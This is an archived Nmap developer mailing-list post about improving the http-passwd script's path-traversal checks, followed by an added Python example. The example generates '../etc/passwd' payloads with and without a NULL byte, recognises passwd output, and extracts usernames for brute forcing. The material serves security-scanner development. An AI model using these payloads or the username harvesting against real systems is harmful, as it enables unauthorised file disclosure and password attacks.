Nmap Development mailing list archives

[NSE] http-passwd improvements


From: George Chatzisofroniou <sophron () latthi com>
Date: Fri, 2 May 2014 16:31:09 +0300

Hi,

While I was testing http-passwd I encountered some cases where the script won't
work even if the target is vulnerable. These are the cases where the target's
'include' function won't accept paths with NULL in them, hence all of the
script's payloads would fail. For example, the NULL byte string vulnerability
was fixed as of PHP 5.3.4 [1], and the script would have no effect there.

I made a commit (r32855) that sends the same payloads to the target this time
without appending the NULL byte. This will work against targets that allow user
input to determine the file path without any sanitization or checks.

There is more room for improvement on this script:

* It should make use of NSE's HTTP crawler.

* It should check for something that looks like a query referring to a file name
not only in the HTTP body response but in the requested URL as well.

* It should contain more payloads forcing the script to download itself. Check
this thread [2].

* If the script is able to retrieve /etc/passwd, it should cache the usernames
(for example the UNIX accounts with ID >= 1000) so that the brute library can
make use of them later.

[1]: http://svn.php.net/viewvc?view=revision&revision=305507
[2]: http://seclists.org/nmap-dev/2014/q1/177

Cheers,

-- 
George Chatzisofroniou
_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/
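The message above describes four pieces of logic: traversal payloads sent both with and without a trailing NULL byte, recognising /etc/passwd in a response body, spotting file-name-like query parameters in the requested URL, and caching usernames with UID >= 1000 for later brute forcing. The block below is an added, stand-alone example of that logic and is not the http-passwd script or any other Nmap project code; it is written in Python rather than NSE Lua so it runs offline without the Nmap libraries. The traversal depth, the `../` separator, the `nologin`/`false` shell filter and the `SAMPLE_PASSWD` body are constructed assumptions for the example, not the script's actual payload list or output from any real host.

```python
import re
from urllib.parse import urlparse, parse_qsl

# Constructed sample body, shaped like what a vulnerable target would return
# for a successful include of /etc/passwd. Not captured from any real host.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    "alice:x:1000:1000:Alice:/home/alice:/bin/bash\n"
    "bob:x:1001:1001:Bob:/home/bob:/bin/bash\n"
    "nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n"
)

# One passwd(5) record: name:passwd:uid:gid:gecos:home:shell
PASSWD_LINE = re.compile(
    r"^([a-z_][a-z0-9_-]*):[^:\n]*:(\d+):(\d+):[^:\n]*:[^:\n]*:([^:\n]*)$", re.M
)


def build_payloads(max_depth=6, target="etc/passwd"):
    """Return traversal payloads, each in a NUL-terminated and a plain form.

    The '%00' variant truncates whatever suffix the application appends
    (e.g. '.php') only where include() still accepts NUL, i.e. PHP before
    5.3.4; the plain variant targets code that hands user input to include()
    with no sanitization at all. Depth and separator are example choices
    (assumptions), not the script's own payload list.
    """
    payloads = []
    for depth in range(1, max_depth + 1):
        path = "../" * depth + target
        payloads.append(path + "%00")  # pre-5.3.4 PHP
        payloads.append(path)          # unsanitized include()
    return payloads


def looks_like_passwd(body, min_lines=2):
    """True if the body holds at least min_lines passwd(5) records and one of
    them is the root account; a bare HTML error page will not match."""
    records = PASSWD_LINE.findall(body)
    return len(records) >= min_lines and any(name == "root" for name, *_ in records)


def extract_usernames(body, min_uid=1000, exclude_nologin=True):
    """Usernames with UID >= min_uid, in file order, suitable as a brute-force
    user list. exclude_nologin additionally drops accounts whose shell is
    nologin/false (such as 'nobody'); that filter is an assumption added here,
    the message itself only mentions the UID threshold."""
    users = []
    for name, uid, _gid, shell in PASSWD_LINE.findall(body):
        if int(uid) < min_uid:
            continue
        if exclude_nologin and shell.rsplit("/", 1)[-1] in ("nologin", "false"):
            continue
        users.append(name)
    return users


# A query value that looks like a file name: path characters plus an extension.
FILE_LIKE = re.compile(r"^[\w./-]+\.[a-z0-9]{1,5}$", re.I)


def file_query_params(url):
    """Query parameters whose value looks like a file name, i.e. candidate
    include() parameters found in the request URL rather than in the body."""
    query = urlparse(url).query
    return {k: v for k, v in parse_qsl(query) if FILE_LIKE.match(v)}


if __name__ == "__main__":
    # Hypothetical URL, used only to show which parameter would be attacked.
    url = "http://target.example/index.php?page=home.html&id=3"
    for param in file_query_params(url):
        for payload in build_payloads(max_depth=2):
            print(f"would request {param}={payload}")
    if looks_like_passwd(SAMPLE_PASSWD):
        print("users for brute:", extract_usernames(SAMPLE_PASSWD))
```

Each payload is emitted twice, NUL-terminated first and then plain, so a target patched past 5.3.4 still gets the variant that works against an unsanitized include(); `looks_like_passwd` insists on a root record plus at least one more line to avoid false positives on pages that merely echo the payload back.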